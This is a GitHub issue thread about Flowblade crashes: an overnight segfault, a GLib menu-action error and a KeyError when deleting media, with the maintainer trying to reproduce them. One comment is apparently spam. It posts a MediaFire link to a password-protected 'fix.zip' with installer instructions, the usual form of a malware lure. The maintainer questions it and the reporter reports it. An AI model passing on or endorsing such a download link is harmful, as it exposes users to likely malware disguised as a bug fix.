### ISSUE TITLE
Segmentation Fault

### ISSUE THREAD

**Issue by Surfoo** [jliljebl/flowblade#1167]
I left Flowblade open during the night, in the morning it was crashed with a segfault : 
```
Saving project...
Fatal Python error: Segmentation fault

Thread 0x00007d51e50ccb80 (most recent call first):
  File "/usr/lib/python3.12/site-packages/gi/overrides/Gio.py", line 42 in run
  File "/usr/lib/python3.12/site-packages/Flowblade/app.py", line 206 in main
  File "/usr/bin/flowblade", line 93 in <module>
```

Please include the following information.
1) Flowblade version (Help->About): 2.16.2
2) MLT version (Help->Runtime Environment): 7.24.0
3) Your distribution and desktop environment(Ubuntu/Unity, Debian/KDE, Mint/Cinnamon etc.): Manjaro
4) X11 or Wayland: X11

**Comment by TechHorizon2003** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jliljebl** [comment]
@Surfoo Hi, is comment by @TechHorizon2003 in anyway related to your issue?

@TechHorizon2003 what are you asking me to download and why?

**Comment by Surfoo** [comment]
I reported his comment.

**Comment by Surfoo** [comment]
I had an other crash right now:

```
(flowblade:2704186): GLib-GIO-ERROR **: 14:24:52.412: g_menu_item_set_detailed_action: Detailed action name 'app.grille_d'image:' has invalid format
[1]    2704186 trace trap (core dumped)  SDL12COMPAT_NO_QUIT_VIDEO=1 GDK_BACKEND=x11 SDL_VIDEODRIVER=x11
```

**Comment by jliljebl** [comment]
Ok, I'll get rid of them right away.

**Comment by jliljebl** [comment]
Haven't seen either of crashes, but I'll first try to reproduce the 'leave on overnight' crash tonight.

**Comment by jliljebl** [comment]
I tested leaving the application open overnight but the crash did not reproduce.

**Comment by Surfoo** [comment]
A project was opened, maybe a memory leak overnight.

**Comment by Surfoo** [comment]
I found an other bug, sometimes when I want to delete a media I have this error:
```
Traceback (most recent call last):
  File "/usr/lib/python3.12/site-packages/Flowblade/projectaction.py", line 2257, in media_file_menu_item_selected
    gui.media_list_view.select_media_file(media_file)
  File "/usr/lib/python3.12/site-packages/Flowblade/guicomponents.py", line 1287, in select_media_file
    self.selected_objects.append(self.widget_for_mediafile[media_file])
                                 ~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^
KeyError: <projectdata.MediaFile object at 0x7a1a2a2412e0>
````

**Comment by jliljebl** [comment]
> I found an other bug, sometimes when I want to delete a media I have this error: 

> Traceback (most recent call last):
  File "/usr/lib/python3.12/site-packages/Flowblade/projectaction.py", line 2257, in media_file_menu_item_selected
    gui.media_list_view.select_media_file(media_file)
  File "/usr/lib/python3.12/site-packages/Flowblade/guicomponents.py", line 1287, in select_media_file
    self.selected_objects.append(self.widget_for_mediafile[media_file])
                                 ~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^
KeyError: <projectdata.MediaFile object at 0x7a1a2a2412e0>

Do you any exact steps to reproduce this? There must be some sequence of actions that I do not perform when using the application because I never get this. I did a test trying add and delete files in different patters 20 times but, not hitting this.

BTW are you using the Flatpak version? If not, could you try to see if you experience same issues with that.

**Comment by Surfoo** [comment]
> Do you any exact steps to reproduce this? There must be some sequence of actions that I do not perform when using the application because I never get this. I did a test trying add and delete files in different patters 20 times but, not hitting this.

I'm working on a video edit, I don't know about the steps, sorry.

> BTW are you using the Flatpak version? If not, could you try to see if you experience same issues with that.

No, I installed it from arch repositories.

**Comment by jliljebl** [comment]
> I'm working on a video edit, I don't know about the steps, sorry.

I added an item on my personal action list to look how this is logically possible as it sort of should not be. if I find something I'll comment here.
